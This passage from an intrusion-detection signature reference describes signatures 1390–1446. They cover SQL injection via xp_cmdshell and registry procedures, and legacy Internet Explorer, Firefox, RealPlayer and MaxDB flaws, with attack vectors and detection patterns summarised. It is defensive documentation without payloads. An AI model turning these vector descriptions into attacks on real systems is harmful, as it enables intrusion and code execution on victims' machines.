machine.The xp_availablemedia extended stored procedure is used to return a list of available storage devices that can
be written.
Signature ID: 1390
SQL Injection attempt through xp_cmdshell Vulnerability
machine.xp_cmdshell extended stored procedure to execute a given command string as an operating-system command
shell and return any output as rows of text.
Signature ID: 1391
SQL Injection attempt through xp_enumdsn vulnerability
machine.xp_enumdsn is an extended stored procedure returns a list of all system DSNs and their descriptions.
Signature ID: 1392
SQL Injection attempt with xp_filelist vulnerability
usually Local System. Alternatively, attacker may also try and used to known whether or not a file exists by using
procedure xp_filelist. This event is generated when an attempt to exploit SQL Injection vulnerability on the remote
machine.the xp_filelist extended stored procedure is used to known whether or not a file exists.
197
Signature ID: 1393
Sql Injection attempt with xp_regdeletekey vulnerability
usually Local System. Alternatively, attacker may also try and delete the registry using procedure xp_regdeletekey.
This event is generated when an attempt to exploit SQL Injection vulnerability on the remote machine. xp_regdeletekey
is an extended stored procedure will delete an entire in the registry key.
Signature ID: 1394
Sql Injection with xp_regread Vulnerability
usually Local System. Alternatively, attacker may also try and modify the registry using procedures such as
xp_regread. This event is generated when an attempt to exploit SQL Injection vulnerability on the remote machine.
xp_regread is an extended stored procedure to read the registry keys.
Signature ID: 1395
SQL Injection attempt using xp_regwrite vulnerability
usually Local System. Alternatively, attacker may also try and modify the registry using procedures such as
xp_regwrite. This event is generated when an attempt to exploit SQL Injection vulnerability on the remote
machine.xp_regwrite is an extended stored procedure is used to write to the registry.
Signature ID: 1396
Microsoft Internet Explorer COM Object Instantiation Memory Corruption Vulnerability-1
Signature Description: Microsoft Internet Explorer 5.01, 5.5 and 6 are prone to a memory corruption vulnerability that
is related to the instantiation of COM objects. COM objects may corrupt system memory and facilitate arbitrary code
execution in the context of the currently logged in user on the affected computer. When instantiating a COM objects as
an ActiveX control, a memory corruption error can occur. A remote attacker could exploit this vulnerability by creating
a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML email. The attacker could
execute arbitrary code on the system and take complete control over the victim's system. User can set a kill bit to the
clsid DF0B3D60-548F-101B-8E65-08002B2BD119 to resolve this issue.
Signature ID: 1397
Microsoft Internet Explorer COM Object Instantiation Memory Corruption Vulnerability
198
execute arbitrary code on the system and take complete control over the victim's system. This signature detects access
to MSWC.MyInfo.1 COM object of MyInfo ASP Component - 'MyInfo.dll'.
Signature ID: 1398
execute arbitrary code on the system and take complete control over the victim's system. User can set a kill bit to the
clsid 8E71888A-423F-11D2-876E-00A0C9082467 to resolve this issue
Signature ID: 1399
to Creator.CdCreator.1 COM object of CdCreator - 'creator.dll'.
Signature ID: 1400
to Creator.CdDevice.1 COM object of CdDevice Class - 'creator.dll'.
Signature ID: 1401
Microsoft IE Nested OBJECT Tag Memory Corruption Vulnerability
Signature Description: Microsoft Internet Explorer is prone to a memory-corruption vulnerability. This issue is due to a
flaw in the application in handling nested OBJECT tags in HTML content, which triggers a NULL dereference. An
attacker could exploit this issue via a malicious web page to potentially execute arbitrary code in the context of the
currently logged-in user, but this has not been confirmed. Exploit attempts likely result in crashing the affected
application. Attackers could exploit this issue through HTML email/newsgroup postings or through other applications
that employ the affected component.
199
Signature ID: 1402
Microsoft Internet Explorer Content-Type Denial Of Service Vulnerability
Signature Description: Internet Explorer is a graphical web browser developed by Microsoft. Microsoft Internet
Explorer version 6.x is vulnerable to a denial of service via a stack-based buffer overflow in wininet.dll. By persuading
a victim to visit a specially-crafted Web page that sends an overly long HTTP "Content-Type" header, a remote
attacker could overflow a buffer and cause the victim's Web browser to crash.
Signature ID: 1403
MS Windows HTML Help HHCtrl ActiveX Control Memory Corruption Vulnerability
developed by Microsoft, and it included as part of the Microsoft Windows line of operating systems, it has been the
most widely used web browser. Microsoft, Internet Explorer 6, Microsoft, Internet Explorer 6 SP1, Microsoft,
Internet Explorer 6 SP2 are vulnerable to a heap-based buffer overflow in the HTML Help ActiveX control
(HHCtrl.ocx), because after received this type of responses the browser does not validate properly 'Image' property. So
a remote attacker may exploit this issue via a malicious web page to execute arbitrary code in the context of the
currently logged-in user. Exploitation attempts may lead to a denial-of-service condition as well. Attackers may also
employ HTML email to carry out an attack. Here a remote attackers to cause a denial of service (application crash) and
possibly execute arbitrary code by repeatedly setting the Image field of an Internet.HHCtrl.1 object to certain values.
Signature ID: 1404
Microsoft IE DataSourceControl DoS Vulnerability
developed by Microsoft, and it included as part of the Microsoft Windows line of operating systems, it has been the
most widely used web browser. Microsoft, Internet Explorer 6, Microsoft, Internet Explorer 6 SP2, Microsoft, Internet
Explorer 6 SP1 are vulnerable to a denial of service, caused by an integer underflow and a NULL pointer dereference
that can occur when processing a malformed DataSourceControl ActiveX object with a negative
"getDataMemberName" property. A remote attacker could exploit this vulnerability to cause a victim's browser to
crash, if the attacker could persuade the victim to visit a malicious Web page.
Signature ID: 1405
MS IE/Apple Safari Browser Table Tag Status Bar URI Spoofing Vulnerability
Signature Description: Microsoft Internet Explorer is commonly abbreviated to IE, it is a series of graphical web
browsers. Apple Safari is a fastest, easiest-to-use web browser in the world. Apple, Mac OS X 10.2.8, Apple, Mac OS
X 10.3.6, Apple, Mac OS X Server 10.2.8, Apple, Mac OS X Server 10.3.6, Microsoft, Internet Explorer
6.0.2800.1106, Microsoft, Outlook Express 6.0 are vulnerable versions. A remote attacker could create a speciallycrafted URL link containing A HREF tags that specify a spoofed address and within these tags, TABLE tags that
specify the destination address, which will cause the spoofed URL to be displayed in the status bar, once the victim
clicked the mouse over the link. An attacker could exploit this vulnerability by creating a malicious Web page and
hosting it on a Web site or by sending it to a victim as an HTML email.
200
Signature ID: 1406
Microsoft Internet Explorer IFRAME Status Bar URI Spoofing Vulnerability
Industry ID: CVE-2005-4679 CVE-2004-1121 CVE-2005-3699 CVE-2005-4678 Bugtraq: 11590
Signature Description: Internet Explorer 6 for Windows XP Service Pack 2 is vulnerable to URI spoofing, Microsoft
Internet Explorer can not handle embedded frames with links surrounded by an other link. Due to mishandling of
<href> tag with IFRAME tag allows the attacker to display a genuine URI, while in background, taking the user to
some other site. Such a thing causes phishing. The attacker could use additional social engineering techniques to trick
the victim into disclosing sensitive information such as credit card numbers, account numbers, and passwords.
Signature ID: 1407
McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
Signature Description: McAfee ePolicy Orchestrator (ePo) is an antivirus program management tool for Microsoft
Windows operating systems. The McAfee ePolicy Orchestrator agent version 3.0 has been reported to a buffer
overflow vulnerability that may be exploited to crash the affected agent. The vulnerability lies in improper parsing
when receiving an HTTP POST request with an invalid value in the Content-Length header. The vulnerability may
cause DoS or arbitrary code execution.
Signature ID: 1409
Microsoft Help and Support Center Argument Injection Vulnerability
Signature Description: Help and Support Center(HSC) is a feature of Microsoft Windows that enables users to
download and install software updates, check hardware compatibility and perform other system related tasks. HSC is
installed by default on Windows XP and Windows Server 2003 systems. Windows XP and Windows Server 2003 are
vulnerable versions existed an argument injection vulnerability in HSC. By creating a specially-crafted hcp URL(By
embedding quotes in the argument, it is possible to insert new arguments to the command), a remote attacker could
execute arbitrary code on the victim's computer, with privileges of the victim, once the URL is clicked. An attacker
could exploit this vulnerability by creating a malicious Web page and hosting it on a Web site or by sending it to a
victim as an HTML email.
Signature ID: 1411
Microsoft Internet Explorer HTML Tag Memory Corruption Vulnerability
Signature Description: Microsoft Internet Explorer 6 is vulnerable to a Memory corruption vulnerability that could
allow a remote attacker to execute arbitrary code on the system. The vulnerability is caused while handling some of
HTML tags that are placed in improper manner. The HTML tag <PRE> is used to display text in a way that preserves
the letters and spaces so that the rendered output is similar to the way the text was originally formatted. The HTML tag
SPAN is used to apply a style, using Cascading Style Sheets (CSS), to a specific block of HTML. When these tags
were not properly closed or mentioned in a HTML file, internal memory structures will not be properly initialized and
may crash the IE browser. Microsoft indicated that code execution is possible but other researchers reported that code
execution is unlikely. If code execution is possible, it would execute in the security context of the logged in user. A
remote, unauthenticated attacker could exploit this vulnerability by crafting an HTML file that contains a specific
combination of HTML tags and style attributes, and then persuading unsuspecting users to open the crafted document
using a vulnerable version of Internet Explorer. Install the updates mentioned in Microsoft security bulletin MS06-013.
Microsoft Internet Explorer 6.0 SP1 and Microsoft Internet Explorer 6.0 are prone to this vulnerability.
201
Signature ID: 1412
Mozilla Firefox Deleted Object Reference Vulnerability
Signature Description: Mozilla Firefox is a free and open source web browser descended from the Mozilla Application
Suite, managed by the Mozilla Corporation. Firefox includes tabbed browsing, a spell checker, incremental find, live
bookmarking, a download manager, and an integrated search system that uses the user's desired search engine. Firefox
versions 1.5 through to 1.5.0.2 running on Windows and Linux platforms are vulnerable. A malicious user(remote
attacker) can exploit this vulnerability to execute arbitrary code or cause a victim's browser to crash by creating a
malicious Web page that uses the contentWindows.focus() JavaScript control to reference a deleted object. This
vulnerability resides in the implementation of based Command controller functions, where objects are not properly
initialized when designMode is enabled. Some malware known use to this exploit.
Signature ID: 1413
Mozilla Browser Marquee Denial of Service Vulnerability
Signature Description: Web browser is a software application which enables a user to display and interact with text,
images, videos, music, games and other information typically located on a Web page at a website on the World Wide
Web or a local area network. Text and images on a Web page can contain hyperlinks to other Web pages at the same or
different website, Web browsers allow a user to quickly and easily access information provided on many Web pages at
many websites by traversing hyperlinks. pera Software Opera Web Browser 8.51 and prior versions, Mozilla
SeaMonkey 1.1.11, Mozilla Grand Paradiso 3.0a1, Mozilla Firefox 2.0.0.3, Mozilla Firefox 1.5.0.3, Microsoft Internet
Explorer 6.0 SP1, Microsoft Internet Explorer 6.0 versions are vulnerable denial of service. A remote attacker could
send a malicious Web page as a mail, after received thia type of mails the brower will consume all available CPU
resources on a victim's system, once the page is loaded.
Signature ID: 1414
Microsoft Windows Media Player PNG Buffer Overflow Vulnerability
Signature Description: Windows Media Player (WMP) is a digital media player and media library application
developed by Microsoft that is used for playing audio, video and viewing images on personal computers running the
Microsoft Windows operating system, as well as on Pocket PC and Windows Mobile-based devices. Microsoft
Windows Media Player XP, Microsoft Windows Media Player 9.0, Microsoft Windows Media Player 7.1, Microsoft
Windows Media Player 10.0 are vulnerable to stack-based buffer overflow. PNG files come as a part of MP Skin
upgrade. If a Windows Media Player skin (.WMZ) file were downloaded from a malicious web site it could potentially
be used to run Java code to read and browse files on a local machine. After received(downloded) these skins, not doing
proper validation(bound checks) of PNG files. So a remote attacker could overflow a buffer and execute arbitrary code
on the system, once the file is opened.
Signature ID: 1415
Microsoft Windows Media Player PNG Buffer Overflow Vulnerability
Signature Description: Microsoft Windows Media Player 7 and above, is vulnerable to a stack-based buffer overflow,
caused by improper bounds checking of PNG files. These PNG files come as a part of MP Skin upgrade. If a Windows
Media Player skin (.WMZ) file were downloaded from a malicious web site it could potentially be used to run Java
202
code to read and browse files on a local machine. By doing so, a remote attacker could overflow a buffer and execute
arbitrary code on the system, once the file is opened.
Signature ID: 1416
MySQL MaxDB Webtool HTTP GET request Stack Overflow Vulnerability
Industry ID: CVE-2005-0684 CVE-2007-3614 CVE-2005-0684 Bugtraq: 13368,24773,13369
Signature Description: MySQL MaxDB is a heavy-duty, SAP-certified open source database. A web based application
interface Webtool which acts as a HTTP server is provided with MaxDB. A remote buffer overflow vulnerability exists
in the way Webtool component recognize and interprets the special characters. This issue is due to a failure of the
application to properly validate the length of user-supplied strings prior to copying them into static process buffers. An
attacker may exploit this issue by sending a malicious HTTP GET request containing a percent sign (%) with 4,000
bytes as a file parameter to MaxDB Webtool default port 9999. Successful exploitation may allow execution of
arbitrary code with the privileges of the user that activated the vulnerable application.
Signature ID: 1417
PeerCast URL Handling Buffer Overflow Vulnerability
Signature Description: PeerCast is an open source streaming media multicast tool. PeerCast uses peer to peer
technology to minimize the necessary upload bandwidth for the original multicastor. PeerCast 0.1217 and prior are
vulnerable to a stack based buffer overflow. This vulnerability is due to insufficient sanitization of user supplied data.
A successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the vulnerable
system. This issue is fixed in PeerCast 0.1217. Administrators are advised to update PeerCast 0.1217 or later version to
resolve this issue.
Signature ID: 1418
Microsoft IE Sysimage Protocol Handler Local File Detection Vulnerability
Bugtraq: 11834
Signature Description: Microsoft Internet Explorer is reported to have a vulnerability that may allow a remote site to
detect files on the local computer. A remote attacker can exploit this issue through the ''sysimage://' protocol handler to
detect the existence of a file on the local computer of the Web client viewing a malicious page. This could lead to a
disclosure of sensitive information to remote attackers or could help him to further plan his more serious attack..
Signature ID: 1420
Microsoft Internet Explorer Content Advisor File Handling Buffer Overflow Vulnerability
Signature Description: The Content adviser is used to control what content is viewable in Internet Explorer. It allows
users to rate the appropriateness of Web content, and to restrict which web sites can be visited by a user. The services
provided by the Content adviser are described in text files which follows the Platform Internet Content Selection
(PICS) standard. A buffer overflow vulnerability exists in the msrating.dll library, where Content adviser processes
PICS description files. The library does not check the length of an attribute in the description file before copying it into
a fixed sized buffer. By convincing a user to view an HTML document (e.g., a web page or HTML email message), an
attacker could execute arbitrary commands or code with the privileges of the user. Microsoft Internet Explorer 5.0.1
SP2, Microsoft Internet Explorer 5.0.1 SP3, Microsoft Internet Explorer 5.0.1 SP4 versions are vulnerable to
vulnerability. This signature will check for flag setted by track-state to generate log.
203
Signature ID: 1422
HTML Winhlp32.exe Remote Buffer Overflow Vulnerability
Signature Description: HTML Help makes use of the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help
ActiveX control is used to provide navigation features (such as a table of contents), to display secondary windows and
pop-up definitions, and to provide other features. Some features, as with the WinHlp Command, provided by the
HTML Help ActiveX control are meant to be available only when it is used from a compiled HTML Help file (.chm)
that is displayed by using the HTML Help Viewer. Winhlp32.exe is vulnerable to a buffer over run attack using the
Item parameter within WinHlp Command, the item parameter is used to specify the file path of the WinHelp (.hlp) file
in which the WinHelp topic is stored, and the window name of the target window. Using this overrun, an attacker can
successfully execute arbitrary code on a remote system by encouraging the victim to visit a particular web page.
Signature ID: 1423
Microsoft Internet Explorer DHTML Engine Race Condition Vulnerability
Signature Description: Dynamic HTML (DHTML) extends static HTML pages to allow interactive web pages to be
easily created. Microsoft Internet Explorer versions 5.01, 5.5, and 6 could allow a remote attacker to execute arbitrary
code caused by a race condition when Dynamic HTML (DHTML) objects are processed. The DHTML Object Model
(DOM) specification allows users to create browser windows in addition to other elements. When a new browser
window is created, it is possible to refer to the parent window from the newly opened window. A race condition occurs
in Microsoft Internet Explorer (IE) when both the child and parent windows try to occupy the same memory due to
improper IE DOM implementation that incorrectly manages threads. Under these conditions it is possible to insert
arbitrary code, and have it run in the context of the web browser that is parsing the DHTML. An attacker could exploit
this vulnerability by creating a malicious Web page or an HTML e-mail message and then persuading the user to visit
the page or to view the HTML e-mail message. An attacker who successfully exploited this vulnerability could take
complete control of the affected system. Install the updates mentioned in Microsoft Security Bulletin MS05-020.
Signature ID: 1424
Windows Shell code vulnerability
Signature Description: This rule gets hit when an external web server sends windows shell code to a client in internal
network. This can be considered as a symptom of accessing a malicious file.
Signature ID: 1425
Microsoft Internet Explorer DHTML Object Race Condition Memory Corruption Vulnerability
Signature Description: Dynamic HTML (DHTML) extends static HTML pages to allow interactive web pages to be
easily created. Microsoft Internet Explorer versions 5.01, 5.5, and 6 could allow a remote attacker to execute arbitrary
code caused by a race condition when Dynamic HTML (DHTML) objects are processed. The DHTML Object Model
(DOM) specification allows users to create browser windows in addition to other elements. When a new browser
window is created, it is possible to refer to the parent window from the newly opened window. A race condition occurs
in Microsoft Internet Explorer (IE) when both the child and parent windows try to occupy the same memory due to
improper IE DOM implementation that incorrectly manages threads. Under these conditions it is possible to insert
arbitrary code, and have it run in the context of the web browser that is parsing the DHTML. This rule specifically
looks for NULL element insertion. This can lead to random crashes and remote command execution. An attacker could
204
exploit this vulnerability by creating a malicious Web page or an HTML e-mail message and then persuading the user
to visit the page or to view the HTML e-mail message.
Signature ID: 1426
Microsoft Internet Explorer URL Parsing Memory Corruption Vulnerability
Signature Description: Windows Internet Explorer, commonly abbreviated to IE, is a series of graphical web browsers
developed by Microsoft and included as part of the Microsoft Windows line of operating systems. Microsoft Internet
Explorer versions 5.01, 5.5, and 6 are vulnerable versions, the buffer overflow vulnerability exists in this version of IE
parsing of URLs while handling the long hostname component. A remote attacker could send a malicious web-page
that contains an URL with a hostname of size longer than 256 bytes and hosting it on a Web site or by sending it to a
victim as an HTML email. After received this type of links the size of the hostname is not properly validated before it
is copied into a buffer, so the buffer will overflow. and possibly execute arbitrary code via this type of URLs.
Successful exploitation allows remote attackers to execute arbitrary code under the privileges of the current user.
Signature ID: 1427
Working Resources's BadBlue HTTP Server ext.dll Buffer Overflow Vulnerability
Signature Description: BadBlue is a complete file sharing system that is simply easier and faster to use than anything
else. BadBlue is a small web server for Windows operating systems, developed by Working Resources Inc. Working
Resources Inc. BadBlue 2.55 version contains remotely exploitable buffer overflow vulnerability. A remote attacker
could send specially-crafted malicious http request to EXT.DLL that request contains a long long mfcisapicommand
parameter with more than 250 chars is sent. After received the request the server not validating the user supplies data,
so while processing the reques buffer over flow will happen. Successful exploitation could allow remote code
execution on the system with user privileges.
Signature ID: 1428
Real Networks Real Player WAV File Processing Heap Overflow Vulnerability
Signature Description: RealNetworks RealPlayer is a multimedia application that allows users to view local and remote
audio/video content. RealPlayer 10.5 (6.0.12.1056 and earlier), 10, 8, and RealOne Player V2 and V1, Real Networks
Real Player and Helix Player are vulnerable to a heap based buffer overflow. The vulnerability is triggered when a
malicious WAV file's LIST chunk is processed. A LIST chunk is used to store associated information about WAV file
like audio track's title, artist, and copyright information etc., While processing memory is allocated for each piece of
information based on a user-controlled length value in the LIST chunk header. This value is not verified, and the actual
data is copied byte-by-byte into the buffer until a NULL terminator is found. Therefore, if the actual data is larger than
the reported length value, a buffer overflow could occur during memory copy operations. Successful exploitation of
this vulnerability may execute arbitrary code with the privileges of the logged in user or may crash the vulnerable
media player.
Signature ID: 1429
MySQL MaxDB Webtool HTTP UNLOCK Request Lock-Token String Stack Overflow
Vulnerability
205
in the way Webtool component handles the Lock-token string for UNLOCK method in a HTTP request. This issue is
due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into
static process buffers. An attacker may exploit this issue by sending a malicious HTTP UNLOCK request along with a
long Lock-Token string to MaxDB Webtool default port 9999. Successful exploitation may allow execution of arbitrary
code with the privileges of the user that activated the vulnerable application.
Signature ID: 1430
Mozilla Firefox PLUGINSPAGE attribute Remote Code Execution Vulnerability
Signature Description: When a web page requires a plugin to display the web page properly, the Plugin Finder Service
(PFS) look for appropriate plugin. If the plugin is not installed the service looks for PLUGINSPAGE attribute in
EMBED tag to locate where the plugin is available and if found PFS opens a dialog that will contain a "manual install"
button that will load the PLUGINSPAGE url. If the PLUGINSPAGE attribute contains a javascript: url then pressing
the button could launch arbitrary code capable of stealing local data or installing malicious code.
Signature ID: 1431
Mozilla Firefox PLUGINSPAGE attribute Remote Code Execution Vulnerability
Signature Description: When a web page requires a plugin to display the web page properly, the Plugin Finder Service
(PFS) look for appropriate plugin. If the plugin is not installed the service looks for PLUGINSPAGE attribute in
EMBED tag to locate where the plugin is available and if found PFS opens a dialog that will contain a "manual install"
button that will load the PLUGINSPAGE url. If the PLUGINSPAGE attribute contains a malformed URL of any
protocol then pressing the button could launch arbitrary code capable of stealing local data or installing malicious code.
Signature ID: 1432
RealNetworks RealPlayer RAM File Parsing Buffer Overflow Vulnerability
Signature Description: RealPlayer is an application for playing various media formats, developed by RealNetworks
Inc. RealPlayer contains a buffer overflow in processing Real Media (.ram) files. A ".ram" file specifies the URL where
media clips are stored. Once the ram file is processed real player contacts the URL to locate and play the media clip.
The vulnerability is due to improper checking of the hostname present in the URL. If a malicious ram file with
hostname string too long is processed by a Real player, buffer overflow occurs. Successful exploitation may execute
arbitrary code or cause the real player to crash.
Signature ID: 1433
Sun Java Web Start System Property Tags Remote Unauthorized Access Vulnerability
Signature Description: Java Web Start is a technology for easy client-side deployment of Java applications. A
vulnerability exists in the way Web Start handles Java system properties defined in Java Network Launching Protocol
(JNLP) files. The <property> tag in a JNLP file can be used to define Java system properties. A few system properties
are considered "secure" and if defined in a JNLP file, they are passed to the Java executable (javaw.exe) via the Dproperty=value command line argument. However, a malicious user can use this feature to inject extra command line
arguments to the Java executable. This is because Web Start fails to use quote symbols around the property argument.
206
Successful exploitation of this vulnerability can lead to the Java "sandbox" being disabled. Sun JRE (Solaris Production
Release) 1.3.1 and prior versions are vulnerable.
Signature ID: 1434
MySQL MaxDB Webtool HTTP POST request Stack Overflow Vulnerability
in the way Webtool component recognize and interprets the special characters. This issue is due to a failure of the
application to properly validate the length of user-supplied strings prior to copying them into static process buffers. An
attacker may exploit this issue by sending a malicious HTTP POST request containing a percent sign (%) with 4,000
bytes as a file parameter to MaxDB Webtool default port 9999. Successful exploitation may allow execution of
arbitrary code with the privileges of the user that activated the vulnerable application.
Signature ID: 1435
Real Player ActiveX Control Exported Functions HandleAction , ShowPreferences Argument
Buffer Overflow Vulnerability
Signature Description: RealNetworks RealPlayer is a multimedia application that allows users to view local and remote
audio/video content. The RealPlayer ActiveX control allows web authors to embed the RealPlayer application in
HTML documents and have control over it. One of the exported functions of the RealPlayer ActiveX control is
HandleAction, which executes a method or action. When the HandleAction function is used to call the
ShowPreferences method, the RealPlayer preferences dialog is displayed, showing the specified category and page.
RealPlayer 10.5 (6.0.12.1040) and earlier versions are vulnerable to execute arbitrary code via a long ShowPreferences
argument. The ShowPreferences method concatenates its two arguments and then makes an unchecked call to sprintf().
By passing long arguments to ShowPreferences, an attacker can cause a stack-based buffer overflow to occur. Any
browser that supports ActiveX may be affected.
Signature ID: 1436
Microsoft Internet Explorer Channel Definition Format Script Execution Vulnerability
Signature Description: Channel Definition Format (CDF) is an XML standard used in conjunction with Microsoft
Active Channel and Smart Offline Favorites technologies. Its use is to define a web site's content and structure.
Microsoft Internet Explorer contains a vulnerability in handling "channel" (CDF) files. The Active Channel data that is
to be downloaded is specified in the CDF file in the form of a URL. Only http, https and ftp protocols are allowed to
download the Active Channel Data. The downloaded files are then properly scrutinized and executed in the context of
Internet Security Zone. But Internet Explorer fails to do proper validity checks on the URLs found in CDF files. A
remote attacker could create a specially-crafted URL link, which would be executed in the victim's Web browser within
the security context of the Internet zone, once the link is clicked. An attacker could exploit this vulnerability by
creating a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML email. Versions
5.01 SP3 and SP4, 5.5 SP2, 6 SP1 of Microsoft Internet Explorer.
Signature ID: 1437
Microsoft Internet Explorer Drag and Drop Events File Download Vulnerability
207
Signature Description: Microsoft DHTML events are special actions that are provided by the DHTML Object Model.
Drag-and-Drop technology incorrectly validates some dynamic HTML (DHTML) events. DHTML Drag-and-Drop
events can manipulate windows to copy objects from one domain to another, including the Local Machine Zone.
Microsoft Internet Explorer do not properly validate objects before placing them on local machine when DHTML Drag
and Drop events are used. This vulnerability permits a file to be downloaded to the user's system after the user clicks a
link or drag and drops an object. An attacker who successfully exploited this vulnerability could cause an executable
file to be saved on the user's system. A malicious HTML page or email can completely compromise a user's system by
installing arbitrary files in the "Startup" folder which will be executed upon next reboot. To exploit this vulnerability,
an attacker would have to host a malicious Web site that contained a Web page that was designed to exploit this
vulnerability and then persuade a user to visit that site. Patches MS05-008 as well as MS05-014 are required to
completely patch this vulnerability.
Signature ID: 1438
Mozilla Firefox Favicon Link Tag Java Script Execution Vulnerability
Signature Description: Firefox and the Mozilla Suite support custom "favicons" through the <LINK rel="icon"> tag.
Browsers that support favicons display them in the browser's URL bar, next to the site's name in lists of bookmarks,
and next to the page's title in a tabbed document interface. The link tag allows to load a custom image as the icon for a
website. Mozilla user interface components like toolbars, menu bars, progress bars, and window title bars can be
modified using a script-based technology called Chrome. Mozilla executes a favicon link tag as a chrome script and
these scripts have elevated privileges. Because of the extra privileges, they can perform actions that web scripts cannot.
Chrome scripts also do not prompt for permission before executing potentially dangerous commands. Firefox versions
prior to 1.0.3 and Mozilla Suite versions prior to 1.7.7 allow execution of javascript in the href argument of link tag. By
setting the href attribute of link tag to a javascript url, it is possible to call chrome functions and run arbitrary code
without user interaction. Attackers could exploit this vulnerability by adding a favicon link tag into a web page
containing a malicious Javascript URL and then enticing a victim to visit the web page. Successful exploitation enables
attackers to execute arbitrary script code or cause a denial of service with elevated privileges.
Signature ID: 1439
Mozilla Suite And Firefox Search Plug-In JavaScript Execution Vulnerability
Signature Description: Mozilla browsers provide search plugin facility to show Search Engine interfaces based on
Apple's Sherlock files. To perform an Internet search, the Sherlock application sends query information to one or more
Internet search sites. The information returned by the search sites is interpreted by the Sherlock application and then
displayed. Firefox enables users to add a new search engine, or modify the old search engine (Google, by default) by
calling the sidebar.addSearchEngine() function and passing a Sherlock file (with .src extension) into this function.
Mozilla Firefox versions prior to 1.0.3 and Mozilla Suite versions prior to 1.7.7 are vulnerable to cross-site scripting
caused by improper sanitization of user-supplied Sherlock files. By creating a special Sherlock file it is possible to run
javascript code in the security context of the currently active tab. This allows to create search engines that silently
monitor all website displayed while searching (e.g. to steal sessions cookies) and/or that wait for a privileged page (e.g.
chrome or about:config) to run arbitrary code such as installing malicious software on the victim's machine.
Signature ID: 1440
Mozilla Firefox Sidebar Panel _search target Script Code Execution Vulnerability
facility to load the web pages in sidebar web panel. Sites can use the _search target (like target=_search") to open links
208
in the Firefox sidebar. A vulnerability exists in Mozilla Firefox versions prior to 1.0.3 caused by improper validation of
user-supplied information in the processing within the Sidebar _search target. By convincing a user to open a privileged
page (like 'about:config' or 'about:plugins'), then use a ('javascript:' or 'data:') URL to access the privileged data or
install arbitrary code on victim's computer. Successful exploitation allows installation of malicious code or steal data
without user interaction. Administrators are advised to upgrade to patched version. This signature detects, if in address
tag found "java script:" pattern.
Signature ID: 1441
Mozilla Firefox Sidebar Panel _search target Script Code Execution Vulnerability
facility to load the web pages in sidebar web panel. Sites can use the _search target (like target=_search") to open links
in the Firefox sidebar. A vulnerability exists in Mozilla Firefox versions prior to 1.0.3 caused by improper validation of
user-supplied information in the processing within the Sidebar _search target. By convincing a user to open a privileged
page (like 'about:config' or 'about:plugins'), then use a ('javascript:' or 'data:') URL to access the privileged data or
install arbitrary code on victim's computer. Successful exploitation allows installation of malicious code or steal data
without user interaction. Administrators are advised to upgrade to patched version. This signature detects, if in address
tag found "data:text/plain" pattern.
Signature ID: 1442
Microsoft Compressed HTML Help (CHM) File transfer attempt Vulnerability
Signature Description: Microsoft Compressed HTML Help is a proprietary format for online help files. Local and
remote programs may distribute help information along with their application, expecting it to be launched by users
when the programs are run. Several potential vulnerabilities exists with Microsoft Windows and Internet Explorer
while accessing a CHM file. Microsoft Internet Explorer 5.0.1 SP1, Microsoft Internet Explorer 6.0, Microsoft Internet
Explorer 5.5 SP2, Microsoft Internet Explorer 5.5 SP1 version may allow an attacker to gain access to the path of the
temporary internet files folder on a remote machine. Microsoft Internet Explorer 5.0.1 SP4, Microsoft Internet
Explorer 5.0.1 SP3, Microsoft Internet Explorer 5.0.1 SP2, Microsoft Internet Explorer 5.0.1 SP1, Microsoft Internet
Explorer 5.0.1, Microsoft Internet Explorer 6.0 SP1, Microsoft Internet Explorer 6.0, Microsoft Internet Explorer 5.5
SP2, Microsoft Internet Explorer 5.5 SP1, Microsoft Internet Explorer 5.5 preview, Microsoft Internet Explorer 5.5
these versions may allows hostile content to be interpreted in the Local Zone. Therefore this signature detects any .chm
file transfer in an HTTP response when user access external web sites. CHM files also have proper usage and user can
trust them when he visits the trusted sources.
Signature ID: 1443
Mozilla IFRAME SRC Javascript Execution in the Context of Other Domain Vulnerability
Signature Description: IFrame (Inline Frame) is an HTML element which makes it possible to embed another HTML
document inside the main document. The Mozilla browsers support IFRAME and they use same origin security model
to maintain separation between browser frames from different sources. Mozilla considers two pages to have the same
origin if the protocol, port (if given), and host are the same for both pages. A window object can be used to represent a
HTML page so that both main HTML Page and its IFRAME page is represented by two separate window objects. But
the window object of the IFRAME element can be accessed using a script in its parent window. For example, the main
window can use the window.history property of an IFRAME window to navigate through its browsing history. A crosssite scripting vulnerability exists because Mozilla does not properly validate the source domain of some URLs stored in
the browser history. When a user navigates through browsing history of IFRAME element that contains Javascript
209
code, Mozilla browsers do not update window.location property correctly. An attacker can create a javascript: URI
containing eval(), cause the user to visit a web site in a different domain, and then programmatically cause the web
browser to return to the previous javascript: page to trigger the cross-domain violation. The violation will also occur if
the user manually clicks the "Back" button to return to the javascript: page. This vulnerability can be used to steal
cookies or other confidential data from the target site. When this attack is combined with CVE-2005-1477 it is possible
to execute arbitrary code.This vulnerability is reported in all versions of Mozilla Firefox browsers up to 1.0.3.
Signature ID: 1444
Mozilla Firefox Install Method IconURL Parameter Java Script Execution Vulnerability
Signature Description: XPInstall is a cross-platform software installation method used by Mozilla-based browsers. By
default the installation of web browser extension is downloaded from addons.mozilla.org and update.mozilla.org. The
installation of an extension can be achieved using script code. A vulnerability exists in Mozilla Firefox 1.0.3 which
may execute JavaScript contained within the IconURL parameter of InstallTrigger.install() with chrome privileges. The
IconURL parameter indicates a location of an icon image file, which is displayed in a web browser. The IconURL
parameter accepts JavaScript URLs (in-line JavaScript) as input. By using an eval() call in that URL arbitrary code can
be executed with elevated privilege. By default only the Mozilla Update site is allowed to attempt software installation
but users can allow other sites. By convincing a user to view an HTML document (e.g., a web page), an attacker could
execute arbitrary commands or code with the privileges of the user. This vulnerability is reported in all versions of
Mozilla Firefox browsers up to 1.0.3. Upgrade to Firefox version 1.0.4 or later to address this issue.
Signature ID: 1446
Mozilla Firefox and Mozilla Suite Script Security Manager Security Check Bypass Vulnerability
Signature Description: Mozilla based browsers have a Script Security Manager which imposes some restrictions
(security checks) to execute java script on certain protocols such as HTTP and FTP. A vulnerability exists in Mozilla
Firefox and Mozilla Suite when view-source: and jar: pseudo protocols are used. Some security checks intended to
prevent script injection in Security Manager were incorrect and could be bypassed by wrapping a javascript: url in the
